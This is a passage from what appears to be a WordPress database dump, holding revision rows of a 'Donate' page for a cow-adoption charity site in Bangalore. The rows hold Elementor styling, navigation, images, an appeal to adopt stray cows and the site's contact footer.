.elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 18:08:28','2022-10-20 12:38:28','',1816,'https://gopalak.in/?p=1973',0,'revision','',0),(1974,1,'2022-10-20 18:08:28','2022-10-20 12:38:28','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 18:08:28','2022-10-20 12:38:28','',1816,'https://gopalak.in/?p=1974',0,'revision','',0),(1975,1,'2022-10-20 18:08:28','2022-10-20 12:38:28','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a 